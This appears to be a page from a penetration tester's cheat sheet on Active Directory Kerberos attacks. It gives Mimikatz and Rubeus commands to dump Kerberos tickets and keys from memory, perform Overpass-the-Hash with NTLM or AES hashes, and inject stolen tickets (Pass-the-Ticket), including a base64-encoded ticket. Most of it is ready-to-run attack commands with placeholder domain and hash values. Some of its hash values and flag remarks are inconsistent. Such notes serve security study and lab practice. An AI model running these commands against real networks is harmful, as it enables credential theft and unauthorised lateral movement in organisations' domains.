Ticket/Hash Attacks

Exporting Tickets

Mimikatz

sekurlsa::tickets /export
or if don't work try
sekurlsa::ekeys

The tickets ending with a $ symbol represent the computer account, which requires a ticket to communicate with the AD. User tickets, on the other hand, include the user's name, followed by an @ symbol that separates the service name and the domain. For example: [randomvalue]-username@service-domain.local.kirbi.

Rubeus

Rubeus.exe dump /nowrap

Overpass-The-Hash

When Pass-The-Hash is mostly used to bypass regular login, then Overpass-The-Hash is using hash for requesting TGT from KDC.

Mimikatz

sekurlsa::pth /domain:amogus.kek /user:carni7 /ntlm:1293uo1uwfoi1hw081

Rubeus

Here we use asktgt module to request a TGT using hash and KDC.

Rubeus.exe asktgt /domain:amogus.kek /user:carni7 /aes256:1293uo1uwfoi1hw081 /nowrap

Pass-The-Ticket

Pass-The-Ticket in contrast of Pass-The-Hash and Overpass-The-Hash use a ticket to gain access to the TGS and then for service.

Mimikatz

kerberos::ptt "C:\Users\carni7\Desktop\Mimikatz\[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi"

Rubeus PTT Using Hash

Rubeus.exe asktgt /domain:amogus.kek /user:carni7 /rc4:1293uo1uwfoi1hw081 /ptt

Unlike command for Overpass-The-Hash, here we are using /ptt to do both Overpass-The-Hash and Pass-The-Ticket simultaneously. But that only works if we give /hash: instead of ticket

Rubeus PTT Using Ticket

Rubeus.exe ptt /ticket:[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi

Rubeus PTT Using Encoded Ticket

[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi"))

Rubeus.exe ptt /ticket:LETSIMAGINETHISISOURBASE64ENCODEDKERBEROSTICKET

PreviousCredentials NextPowershell Remoting

Last updated 6 months ago